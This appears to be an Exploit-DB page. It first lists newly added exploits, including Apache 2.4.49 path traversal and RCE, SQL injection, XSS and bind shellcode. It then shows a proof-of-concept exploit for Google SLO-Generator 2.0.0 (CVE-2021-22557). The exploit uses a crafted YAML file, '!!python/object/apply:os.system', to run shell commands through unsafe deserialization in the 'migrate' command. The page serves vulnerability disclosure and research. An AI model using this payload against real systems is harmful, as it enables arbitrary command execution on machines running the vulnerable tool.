794d9e4342
8 changes to exploits/shellcodes Google SLO-Generator 2.0.0 - Code Execution Apache HTTP Server 2.4.49 - Path Traversal Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated) Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated) Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated) Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
24 lines
No EOL
863 B
Text
24 lines
No EOL
863 B
Text
# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
|
|
# Date: 2021-09-28
|
|
# Exploit Author: Kiran Ghimire
|
|
# Software Link: https://github.com/google/slo-generator/releases
|
|
# Version: <= 2.0.0
|
|
# Tested on: Linux
|
|
# CVE: CVE-2021-22557
|
|
|
|
##############################################################################
|
|
|
|
*Introduction*:
|
|
Is a tool to compute and export Service Level Objectives (SLOs), Error
|
|
Budgets and Burn Rates, using configurations written in YAML (or JSON)
|
|
format.
|
|
|
|
##############################################################################
|
|
|
|
*POC:*
|
|
1. pip3 install slo-generator==2.0.0
|
|
2. 2. Save the below yaml code in a file as exploit.yaml.
|
|
!!python/object/apply:os.system ["id;whoami"]
|
|
3. Run the below command
|
|
slo-generator migrate -b exploit.yaml
|
|
############################################################################## |